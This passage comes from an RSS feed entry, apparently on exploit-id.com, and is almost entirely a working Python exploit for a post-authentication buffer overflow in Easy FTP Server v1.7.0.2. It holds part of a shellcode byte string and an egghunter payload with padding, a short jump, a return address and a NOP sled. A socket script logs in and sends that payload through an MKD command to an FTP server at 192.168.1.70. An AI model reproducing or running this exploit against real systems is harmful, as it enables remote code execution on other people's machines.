<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>4b<span style="color: #000099; font-weight: bold;">\x</span>65<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>a3<span style="color: #000099; font-weight: bold;">\x</span>fc<span style="color: #000099; font-weight: bold;">\x</span>e6<span style="color: #000099; font-weight: bold;">\x</span>f0<span style="color: #000099; font-weight: bold;">\x</span>57<span style="color: #000099; font-weight: bold;">\x</span>64<span style="color: #000099; font-weight: bold;">\x</span>9b<span style="color: #000099; font-weight: bold;">\x</span>9d<span style="color: #000099; font-weight: bold;">\x</span>d2<span style="color: #000099; font-weight: bold;">\x</span>1a<span style="color: #000099; font-weight: bold;">\x</span>7b<span style="color: #000099; font-weight: bold;">\x</span>23<span style="color: #000099; font-weight: bold;">\x</span>78&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>b6<span style="color: #000099; font-weight: bold;">\x</span>12<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>e9<span style="color: #000099; font-weight: bold;">\x</span>3b<span style="color: #000099; font-weight: bold;">\x</span>91<span style="color: #000099; font-weight: bold;">\x</span>63<span style="color: #000099; font-weight: bold;">\x</span>88<span style="color: #000099; font-weight: bold;">\x</span>cf<span style="color: #000099; font-weight: bold;">\x</span>36<span style="color: #000099; font-weight: bold;">\x</span>f6<span style="color: #000099; font-weight: bold;">\x</span>39<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>af<span style="color: #000099; font-weight: bold;">\x</span>83<span style="color: #000099; font-weight: bold;">\x</span>de&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>3b<span style="color: #000099; font-weight: bold;">\x</span>0f<span style="color: #000099; font-weight: bold;">\x</span>43<span style="color: #000099; font-weight: bold;">\x</span>61<span style="color: #000099; font-weight: bold;">\x</span>f8<span style="color: #000099; font-weight: bold;">\x</span>0b<span style="color: #000099; font-weight: bold;">\x</span>9b&quot;</span><span style="color: black;">&#41;</span>
&nbsp;
payload = <span style="color: #483d8b;">&quot;A&quot;</span><span style="color: #66cc66;">*</span><span style="color: #ff4500;">7</span> + <span style="color: #483d8b;">&quot;w00tw00t&quot;</span> + shellcode + <span style="color: #483d8b;">&quot;A&quot;</span><span style="color: #66cc66;">*</span><span style="color: #ff4500;">10</span> + <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>EB<span style="color: #000099; font-weight: bold;">\x</span>07<span style="color: #000099; font-weight: bold;">\x</span>90<span style="color: #000099; font-weight: bold;">\x</span>90&quot;</span> + <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>26<span style="color: #000099; font-weight: bold;">\x</span>19<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>78&quot;</span> + <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>90&quot;</span><span style="color: #66cc66;">*</span><span style="color: #ff4500;">25</span> + bunny + <span style="color: #483d8b;">&quot;A&quot;</span><span style="color: #66cc66;">*</span><span style="color: #ff4500;">133</span>
&nbsp;
s=<span style="color: #dc143c;">socket</span>.<span style="color: #dc143c;">socket</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">socket</span>.<span style="color: black;">AF_INET</span>,<span style="color: #dc143c;">socket</span>.<span style="color: black;">SOCK_STREAM</span><span style="color: black;">&#41;</span>
connect=s.<span style="color: black;">connect</span><span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'192.168.1.70'</span>,<span style="color: #ff4500;">21</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'USER b33f<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'PASS b33f<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'MKD '</span> + payload + <span style="color: #483d8b;">'<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'QUIT<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
s.<span style="color: black;">close</span></pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.exploit-id.com/remote-exploits/easy-ftp-server-v1-7-0-2-post-authentication-bof/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
